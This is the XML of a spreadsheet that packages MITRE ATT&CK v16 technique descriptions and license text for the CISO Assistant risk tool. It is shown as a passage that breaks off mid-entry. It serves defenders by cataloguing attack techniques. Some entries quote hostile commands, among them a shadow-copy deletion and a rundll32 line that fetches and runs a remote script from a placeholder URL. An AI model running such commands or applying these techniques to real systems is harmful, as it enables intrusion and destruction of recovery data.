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mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
    <mc:Choice Requires="x15">
      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="C:\Users\JulianDoloir\Desktop\Repos\intuitem\ciso-assistant-community\tools\excel\mitre\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{58DBE627-7E0F-4D0C-A696-C74FA3B3F33A}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="1485" yWindow="-15870" windowWidth="25440" windowHeight="15990" activeTab="2" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
  </bookViews>
  <sheets>
    <sheet name="library_meta" sheetId="1" r:id="rId1"/>
    <sheet name="Mitre threats_meta" sheetId="2" r:id="rId2"/>
    <sheet name="Mitre threats_content" sheetId="3" r:id="rId3"/>
    <sheet name="Mitre mitigations_meta" sheetId="4" r:id="rId4"/>
    <sheet name="Mitre mitigations_content" sheetId="5"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2" i="5" l="1"/>
  <c r="G14" i="5"/>
  <c r="G26" i="5"/>
  <c r="G38" i="5"/>
  <c r="G3" i="5"/>
  <c r="G15" i="5"/>
  <c r="G27" i="5"/>
  <c r="G39" i="5"/>
  <c r="G4" i="5"/>
  <c r="G16" i="5"/>
  <c r="G28" i="5"/>
  <c r="G40" i="5"/>
  <c r="G5" i="5"/>
  <c r="G20" i="5"/>
  <c r="G35" i="5"/>
  <c r="G7" i="5"/>
  <c r="G22" i="5"/>
  <c r="G37" i="5"/>
  <c r="G6" i="5"/>
  <c r="G24" i="5"/>
  <c r="G44" i="5"/>
  <c r="G8" i="5"/>
  <c r="G25" i="5"/>
  <c r="G45" i="5"/>
  <c r="G9" i="5"/>
  <c r="G31" i="5"/>
  <c r="G10" i="5"/>
  <c r="G32" i="5"/>
  <c r="G11" i="5"/>
  <c r="G36" i="5"/>
  <c r="G12" i="5"/>
  <c r="G41" i="5"/>
  <c r="G13" i="5"/>
  <c r="G17" i="5"/>
  <c r="G18" i="5"/>
  <c r="G19" i="5"/>
  <c r="G21" i="5"/>
  <c r="G23" i="5"/>
  <c r="G29" i="5"/>
  <c r="G30" i="5"/>
  <c r="G33" i="5"/>
  <c r="G34" i="5"/>
  <c r="G42" i="5"/>
  <c r="G43" i="5"/>
</calcChain>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="3439" uniqueCount="3223">
  <si>
    <t>type</t>
  </si>
  <si>
    <t>library</t>
  </si>
  <si>
    <t>urn</t>
  </si>
  <si>
    <t>urn:intuitem:risk:library:mitre-attack</t>
  </si>
  <si>
    <t>version</t>
  </si>
  <si>
    <t>locale</t>
  </si>
  <si>
    <t>en</t>
  </si>
  <si>
    <t>ref_id</t>
  </si>
  <si>
    <t>mitre-attack</t>
  </si>
  <si>
    <t>name</t>
  </si>
  <si>
    <t>Mitre ATT&amp;CK v16 - Threats and mitigations</t>
  </si>
  <si>
    <t>description</t>
  </si>
  <si>
    <t>copyright</t>
  </si>
  <si>
    <t>Terms of Use
LICENSE
The MITRE Corporation (MITRE) hereby grants you a non-exclusive, royalty-free license to use ATT&amp;CK® for research, development, and commercial purposes. Any copy you make for such purposes is authorized provided that you reproduce MITRE's copyright designation and this license in any such copy.
"© 2022 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation."
DISCLAIMERS
MITRE does not claim ATT&amp;CK enumerates all possibilities for the types of actions and behaviors documented as part of its adversary model and framework of techniques. Using the information contained within ATT&amp;CK to address or cover full categories of techniques will not guarantee full defensive coverage as there may be undisclosed techniques or variations on existing techniques not documented by ATT&amp;CK.
ALL DOCUMENTS AND THE INFORMATION CONTAINED THEREIN ARE PROVIDED ON AN "AS IS" BASIS AND THE CONTRIBUTOR, THE ORGANIZATION HE/SHE REPRESENTS OR IS SPONSORED BY (IF ANY), THE MITRE CORPORATION, ITS BOARD OF TRUSTEES, OFFICERS, AGENTS, AND EMPLOYEES, DISCLAIM ALL WARRANTIES, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTY THAT THE USE OF THE INFORMATION THEREIN WILL NOT INFRINGE ANY RIGHTS OR ANY IMPLIED WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE.</t>
  </si>
  <si>
    <t>provider</t>
  </si>
  <si>
    <t>Mitre ATT&amp;CK</t>
  </si>
  <si>
    <t>packager</t>
  </si>
  <si>
    <t>intuitem</t>
  </si>
  <si>
    <t>threats</t>
  </si>
  <si>
    <t>base_urn</t>
  </si>
  <si>
    <t>urn:intuitem:risk:threat:mitre-attack</t>
  </si>
  <si>
    <t>T1055.011</t>
  </si>
  <si>
    <t>Extra Window Memory Injection</t>
  </si>
  <si>
    <t>Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process. 
Before creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulate appearance and behavior (via windows procedures, which are functions that handle input/output of data).(Citation: Microsoft Window Classes) Registration of new windows classes can include a request for up to 40 bytes of EWM to be appended to the allocated memory of each instance of that class. This EWM is intended to store data specific to that window and has specific application programming interface (API) functions to set and get its value. (Citation: Microsoft GetWindowLong function) (Citation: Microsoft SetWindowLong function)
Although small, the EWM is large enough to store a 32-bit pointer and is often used to point to a windows procedure. Malware may possibly utilize this memory location in part of an attack chain that includes writing code to shared sections of the process’s memory, placing a pointer to the code in EWM, then invoking execution by returning execution control to the address in the process’s EWM.
Execution granted through EWM injection may allow access to both the target process's memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as &lt;code&gt;WriteProcessMemory&lt;/code&gt; and &lt;code&gt;CreateRemoteThread&lt;/code&gt;.(Citation: Elastic Process Injection July 2017) More sophisticated malware samples may also potentially bypass protection mechanisms such as data execution prevention (DEP) by triggering a combination of windows procedures and other system functions that will rewrite the malicious payload inside an executable portion of the target process.  (Citation: MalwareTech Power Loader Aug 2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via EWM injection may also evade detection from security products since the execution is masked under a legitimate process.
https://attack.mitre.org/techniques/T1055/011</t>
  </si>
  <si>
    <t>T1053.005</t>
  </si>
  <si>
    <t>Scheduled Task</t>
  </si>
  <si>
    <t>Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111) utility can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) (WMI) to create a scheduled task. Adversaries may also utilize the Powershell Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red Team)
An adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and/or to run a process under the context of a specified account (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), adversaries have also abused the Windows Task Scheduler to potentially mask one-time execution under signed/trusted system processes.(Citation: ProofPoint Serpent)
Adversaries may also create "hidden" scheduled tasks (i.e. [Hide Artifacts](https://attack.mitre.org/techniques/T1564)) that may not be visible to defender tools and manual queries used to enumerate tasks. Specifically, an adversary may hide a task from `schtasks /query` and the Task Scheduler by deleting the associated Security Descriptor (SD) registry value (where deletion of this value must be completed using SYSTEM permissions).(Citation: SigmaHQ)(Citation: Tarrask scheduled task) Adversaries may also employ alternate methods to hide tasks, such as altering the metadata (e.g., `Index` value) within associated registry keys.(Citation: Defending Against Scheduled Task Attacks in Windows Environments)
https://attack.mitre.org/techniques/T1053/005</t>
  </si>
  <si>
    <t>T1205.002</t>
  </si>
  <si>
    <t>Socket Filters</t>
  </si>
  <si>
    <t>Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
To establish a connection, an adversary sends a crafted packet to the targeted host that matches the installed filter criteria.(Citation: haking9 libpcap network sniffing) Adversaries have used these socket filters to trigger the installation of implants, conduct ping backs, and to invoke command shells. Communication with these socket filters may also be used in conjunction with [Protocol Tunneling](https://attack.mitre.org/techniques/T1572).(Citation: exatrack bpf filters passive backdoors)(Citation: Leonardo Turla Penquin May 2020)
Filters can be installed on any Unix-like platform with `libpcap` installed or on Windows hosts using `Winpcap`.  Adversaries may use either `libpcap` with `pcap_setfilter` or the standard library function `setsockopt` with `SO_ATTACH_FILTER` options. Since the socket connection is not active until the packet is received, this behavior may be difficult to detect due to the lack of activity on a host, low CPU overhead, and limited visibility into raw socket usage.
https://attack.mitre.org/techniques/T1205/002</t>
  </si>
  <si>
    <t>T1560.001</t>
  </si>
  <si>
    <t>Archive via Utility</t>
  </si>
  <si>
    <t>Adversaries may use utilities to compress and/or encrypt collected data prior to exfiltration. Many utilities include functionalities to compress, encrypt, or otherwise package data into a format that is easier/more secure to transport.
Adversaries may abuse various utilities to compress or encrypt data before exfiltration. Some third party utilities may be preinstalled, such as &lt;code&gt;tar&lt;/code&gt; on Linux and macOS or &lt;code&gt;zip&lt;/code&gt; on Windows systems. 
On Windows, &lt;code&gt;diantz&lt;/code&gt; or &lt;code&gt; makecab&lt;/code&gt; may be used to package collected files into a cabinet (.cab) file. &lt;code&gt;diantz&lt;/code&gt; may also be used to download and compress files from remote locations (i.e. [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002)).(Citation: diantz.exe_lolbas) &lt;code&gt;xcopy&lt;/code&gt; on Windows can copy files and directories with a variety of options. Additionally, adversaries may use [certutil](https://attack.mitre.org/software/S0160) to Base64 encode collected data before exfiltration. 
Adversaries may use also third party utilities, such as 7-Zip, WinRAR, and WinZip, to perform similar activities.(Citation: 7zip Homepage)(Citation: WinRAR Homepage)(Citation: WinZip Homepage)
https://attack.mitre.org/techniques/T1560/001</t>
  </si>
  <si>
    <t>T1021.005</t>
  </si>
  <si>
    <t>VNC</t>
  </si>
  <si>
    <t>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC).  VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computer’s display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)
VNC differs from [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) as VNC is screen-sharing software rather than resource-sharing software. By default, VNC uses the system's authentication, but it can be configured to use credentials specific to VNC.(Citation: MacOS VNC software for Remote Desktop)(Citation: VNC Authentication)
Adversaries may abuse VNC to perform malicious actions as the logged-on user such as opening documents, downloading files, and running arbitrary commands. An adversary could use VNC to remotely control and monitor a system to collect data and information to pivot to other systems within the network. Specific VNC libraries/implementations have also been susceptible to brute force attacks and memory usage exploitation.(Citation: Hijacking VNC)(Citation: macOS root VNC login without authentication)(Citation: VNC Vulnerabilities)(Citation: Offensive Security VNC Authentication Check)(Citation: Attacking VNC Servers PentestLab)(Citation: Havana authentication bug)
https://attack.mitre.org/techniques/T1021/005</t>
  </si>
  <si>
    <t>T1047</t>
  </si>
  <si>
    <t>Windows Management Instrumentation</t>
  </si>
  <si>
    <t>Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is designed for programmers and is the infrastructure for management data and operations on Windows systems.(Citation: WMI 1-3) WMI is an administration feature that provides a uniform environment to access Windows system components.
The WMI service enables both local and remote access, though the latter is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) and [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006).(Citation: WMI 1-3) Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.(Citation: WMI 1-3) (Citation: Mandiant WMI)
An adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for [Discovery](https://attack.mitre.org/tactics/TA0007) as well as [Execution](https://attack.mitre.org/tactics/TA0002) of commands and payloads.(Citation: Mandiant WMI) For example, `wmic.exe` can be abused by an adversary to delete shadow copies with the command `wmic.exe Shadowcopy Delete` (i.e., [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490)).(Citation: WMI 6)
**Note:** `wmic.exe` is deprecated as of January of 2024, with the WMIC feature being “disabled by default” on Windows 11+. WMIC will be removed from subsequent Windows releases and replaced by [PowerShell](https://attack.mitre.org/techniques/T1059/001) as the primary WMI interface.(Citation: WMI 7,8) In addition to PowerShell and tools like `wbemtool.exe`, COM APIs can also be used to programmatically interact with WMI via C++, .NET, VBScript, etc.(Citation: WMI 7,8)
https://attack.mitre.org/techniques/T1047</t>
  </si>
  <si>
    <t>T1113</t>
  </si>
  <si>
    <t>Screen Capture</t>
  </si>
  <si>
    <t>Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as &lt;code&gt;CopyFromScreen&lt;/code&gt;, &lt;code&gt;xwd&lt;/code&gt;, or &lt;code&gt;screencapture&lt;/code&gt;.(Citation: CopyFromScreen .NET)(Citation: Antiquated Mac Malware)
https://attack.mitre.org/techniques/T1113</t>
  </si>
  <si>
    <t>T1027.011</t>
  </si>
  <si>
    <t>Fileless Storage</t>
  </si>
  <si>
    <t>Adversaries may store data in "fileless" formats to conceal malicious activity from defenses. Fileless storage can be broadly defined as any format other than a file. Common examples of non-volatile fileless storage in Windows systems include the Windows Registry, event logs, or WMI repository.(Citation: Microsoft Fileless)(Citation: SecureList Fileless) In Linux systems, shared memory directories such as `/dev/shm`, `/run/shm`, `/var/run`, and `/var/lock` may also be considered fileless storage, as files written to these directories are mapped directly to RAM and not stored on the disk.(Citation: Elastic Binary Executed from Shared Memory Directory)(Citation: Akami Frog4Shell 2024)(Citation: Aquasec Muhstik Malware 2024)
Similar to fileless in-memory behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620) and [Process Injection](https://attack.mitre.org/techniques/T1055), fileless data storage may remain undetected by anti-virus and other endpoint security tools that can only access specific file formats from disk storage. Leveraging fileless storage may also allow adversaries to bypass the protections offered by read-only file systems in Linux.(Citation: Sysdig Fileless Malware 23022)
Adversaries may use fileless storage to conceal various types of stored data, including payloads/shellcode (potentially being used as part of [Persistence](https://attack.mitre.org/tactics/TA0003)) and collected data not yet exfiltrated from the victim (e.g., [Local Data Staging](https://attack.mitre.org/techniques/T1074/001)). Adversaries also often encrypt, encode, splice, or otherwise obfuscate this fileless data when stored.
Some forms of fileless storage activity may indirectly create artifacts in the file system, but in central and otherwise difficult to inspect formats such as the WMI (e.g., `%SystemRoot%\System32\Wbem\Repository`) or Registry (e.g., `%SystemRoot%\System32\Config`) physical files.(Citation: Microsoft Fileless)
https://attack.mitre.org/techniques/T1027/011</t>
  </si>
  <si>
    <t>T1037</t>
  </si>
  <si>
    <t>Boot or Logon Initialization Scripts</t>
  </si>
  <si>
    <t>Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence.(Citation: Mandiant APT29 Eye Spy Email Nov 22)(Citation: Anomali Rocke March 2019) Initialization scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. These scripts can vary based on operating system and whether applied locally or remotely.  
Adversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. 
An adversary may also be able to escalate their privileges since some boot or logon initialization scripts run with higher privileges.
https://attack.mitre.org/techniques/T1037</t>
  </si>
  <si>
    <t>T1557</t>
  </si>
  <si>
    <t>Adversary-in-the-Middle</t>
  </si>
  <si>
    <t>Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002), or replay attacks ([Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212)). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM Basics)
For example, adversaries may manipulate victim DNS settings to enable other malicious activities such as preventing/redirecting users from accessing legitimate sites and/or pushing additional malware.(Citation: ttint_rat)(Citation: dns_changer_trojans)(Citation: ad_blocker_with_miner) Adversaries may also manipulate DNS and leverage their position in order to intercept user credentials, including access tokens ([Steal Application Access Token](https://attack.mitre.org/techniques/T1528)) and session cookies ([Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)).(Citation: volexity_0day_sophos_FW)(Citation: Token tactics) [Downgrade Attack](https://attack.mitre.org/techniques/T1562/010)s can also be used to establish an AiTM position, such as by negotiating a less secure, deprecated, or weaker version of communication protocol (SSL/TLS) or encryption algorithm.(Citation: mitm_tls_downgrade_att)(Citation: taxonomy_downgrade_att_tls)(Citation: tlseminar_downgrade_att)
Adversaries may also leverage the AiTM position to attempt to monitor and/or modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries can setup a position similar to AiTM to prevent traffic from flowing to the appropriate destination, potentially to [Impair Defenses](https://attack.mitre.org/techniques/T1562) and/or in support of a [Network Denial of Service](https://attack.mitre.org/techniques/T1498).
https://attack.mitre.org/techniques/T1557</t>
  </si>
  <si>
    <t>T1033</t>
  </si>
  <si>
    <t>System Owner/User Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Various utilities and commands may acquire this information, including &lt;code&gt;whoami&lt;/code&gt;. In macOS and Linux, the currently logged in user can be identified with &lt;code&gt;w&lt;/code&gt; and &lt;code&gt;who&lt;/code&gt;. On macOS the &lt;code&gt;dscl . list /Users | grep -v '_'&lt;/code&gt; command can also be used to enumerate user accounts. Environment variables, such as &lt;code&gt;%USERNAME%&lt;/code&gt; and &lt;code&gt;$USER&lt;/code&gt;, may also be used to access this information.
On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show users` and `show ssh` can be used to display users currently logged into the device.(Citation: show_ssh_users_cmd_cisco)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)
https://attack.mitre.org/techniques/T1033</t>
  </si>
  <si>
    <t>T1583</t>
  </si>
  <si>
    <t>Acquire Infrastructure</t>
  </si>
  <si>
    <t>Adversaries may buy, lease, rent, or obtain infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Some infrastructure providers offer free trial periods, enabling infrastructure acquisition at limited to no cost.(Citation: Free Trial PurpleUrchin) Additionally, botnets are available for rent or purchase.
Use of these infrastructure solutions allows adversaries to stage, launch, and execute operations. Solutions may help adversary operations blend in with traffic that is seen as normal, such as contacting third-party web services or acquiring infrastructure to support [Proxy](https://attack.mitre.org/techniques/T1090), including from residential proxy services.(Citation: amnesty_nso_pegasus)(Citation: FBI Proxies Credential Stuffing)(Citation: Mandiant APT29 Microsoft 365 2022) Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.
https://attack.mitre.org/techniques/T1583</t>
  </si>
  <si>
    <t>T1218.011</t>
  </si>
  <si>
    <t>Rundll32</t>
  </si>
  <si>
    <t>Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: &lt;code&gt;rundll32.exe {DLLname, DLLfunction}&lt;/code&gt;).
Rundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions &lt;code&gt;Control_RunDLL&lt;/code&gt; and &lt;code&gt;Control_RunDLLAsUser&lt;/code&gt;. Double-clicking a .cpl file also causes rundll32.exe to execute.(Citation: Trend Micro CPL) For example, [ClickOnce](https://attack.mitre.org/techniques/T1127/002) can be proxied through Rundll32.exe.
Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: &lt;code&gt;rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")"&lt;/code&gt;  This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)
Adversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command &lt;code&gt;rundll32.exe ExampleDLL.dll, ExampleFunction&lt;/code&gt;, rundll32.exe would first attempt to execute &lt;code&gt;ExampleFunctionW&lt;/code&gt;, or failing that &lt;code&gt;ExampleFunctionA&lt;/code&gt;, before loading &lt;code&gt;ExampleFunction&lt;/code&gt;). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending &lt;code&gt;W&lt;/code&gt; and/or &lt;code&gt;A&lt;/code&gt; to harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll) DLL functions can also be exported and executed by an ordinal number (ex: &lt;code&gt;rundll32.exe file.dll,#1&lt;/code&gt;).
Additionally, adversaries may use [Masquerading](https://attack.mitre.org/techniques/T1036) techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.(Citation: rundll32.exe defense evasion)
https://attack.mitre.org/techniques/T1218/011</t>
  </si>
  <si>
    <t>T1613</t>
  </si>
  <si>
    <t>Container and Resource Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to discover containers and other resources that are available within a containers environment. Other resources may include images, deployments, pods, nodes, and other information such as the status of a cluster.
These resources can be viewed within web applications such as the Kubernetes dashboard or can be queried via the Docker and Kubernetes APIs.(Citation: Docker API)(Citation: Kubernetes API) In Docker, logs may leak information about the environment, such as the environment’s configuration, which services are available, and what cloud provider the victim may be utilizing. The discovery of these resources may inform an adversary’s next steps in the environment, such as how to perform lateral movement and which methods to utilize for execution.
https://attack.mitre.org/techniques/T1613</t>
  </si>
  <si>
    <t>T1583.007</t>
  </si>
  <si>
    <t>Serverless</t>
  </si>
  <si>
    <t>Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.
Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector)(Citation: GWS Apps Script Abuse 2021) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers - making it easier to [Hide Infrastructure](https://attack.mitre.org/techniques/T1665).(Citation: Detecting Command &amp; Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)
https://attack.mitre.org/techniques/T1583/007</t>
  </si>
  <si>
    <t>T1132.001</t>
  </si>
  <si>
    <t>Standard Encoding</t>
  </si>
  <si>
    <t>Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME.(Citation: Wikipedia Binary-to-text Encoding)(Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.
https://attack.mitre.org/techniques/T1132/001</t>
  </si>
  <si>
    <t>T1027.009</t>
  </si>
  <si>
    <t>Embedded Payloads</t>
  </si>
  <si>
    <t>Adversaries may embed payloads within other files to conceal malicious content from defenses. Otherwise seemingly benign files (such as scripts and executables) may be abused to carry and obfuscate malicious payloads and content. In some cases, embedded payloads may also enable adversaries to [Subvert Trust Controls](https://attack.mitre.org/techniques/T1553) by not impacting execution controls such as digital signatures and notarization tickets.(Citation: Sentinel Labs) 
Adversaries may embed payloads in various file formats to hide payloads.(Citation: Microsoft Learn) This is similar to [Steganography](https://attack.mitre.org/techniques/T1027/003), though does not involve weaving malicious content into specific bytes and patterns related to legitimate digital media formats.(Citation: GitHub PSImage) 
For example, adversaries have been observed embedding payloads within or as an overlay of an otherwise benign binary.(Citation: Securelist Dtrack2) Adversaries have also been observed nesting payloads (such as executables and run-only scripts) inside a file of the same format.(Citation: SentinelLabs reversing run-only applescripts 2021) 
Embedded content may also be used as [Process Injection](https://attack.mitre.org/techniques/T1055) payloads used to infect benign system processes.(Citation: Trend Micro) These embedded then injected payloads may be used as part of the modules of malware designed to provide specific features such as encrypting C2 communications in support of an orchestrator module. For example, an embedded module may be injected into default browsers, allowing adversaries to then communicate via the network.(Citation: Malware Analysis Report ComRAT)
https://attack.mitre.org/techniques/T1027/009</t>
  </si>
  <si>
    <t>T1556.003</t>
  </si>
  <si>
    <t>Pluggable Authentication Modules</t>
  </si>
  <si>
    <t>Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is &lt;code&gt;pam_unix.so&lt;/code&gt;, which retrieves, sets, and verifies account authentication information in &lt;code&gt;/etc/passwd&lt;/code&gt; and &lt;code&gt;/etc/shadow&lt;/code&gt;.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
Adversaries may modify components of the PAM system to create backdoors. PAM components, such as &lt;code&gt;pam_unix.so&lt;/code&gt;, can be patched to accept arbitrary adversary supplied values as legitimate credentials.(Citation: PAM Backdoor)
Malicious modifications to the PAM system may also be abused to steal credentials. Adversaries may infect PAM resources with code to harvest user credentials, since the values exchanged with PAM components may be plain-text since PAM does not store passwords.(Citation: PAM Creds)(Citation: Apple PAM)
https://attack.mitre.org/techniques/T1556/003</t>
  </si>
  <si>
    <t>T1578.004</t>
  </si>
  <si>
    <t>Revert Cloud Instance</t>
  </si>
  <si>
    <t>An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.
Another variation of this technique is to utilize temporary storage attached to the compute instance. Most cloud providers provide various types of storage including persistent, local, and/or ephemeral, with the ephemeral types often reset upon stop/restart of the VM.(Citation: Tech Republic - Restore AWS Snapshots)(Citation: Google - Restore Cloud Snapshot)
https://attack.mitre.org/techniques/T1578/004</t>
  </si>
  <si>
    <t>T1592</t>
  </si>
  <si>
    <t>Gather Victim Host Information</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
Adversaries may also gather victim host information via User-Agent HTTP headers, which are sent to a server to identify the application, operating system, vendor, and/or version of the requesting user agent. This can be used to inform the adversary’s follow-on action. For example, adversaries may check user agents for the requesting operating system, then only serve malware for target operating systems while ignoring others.(Citation: TrellixQakbot)
https://attack.mitre.org/techniques/T1592</t>
  </si>
  <si>
    <t>T1596.003</t>
  </si>
  <si>
    <t>Digital Certificates</t>
  </si>
  <si>
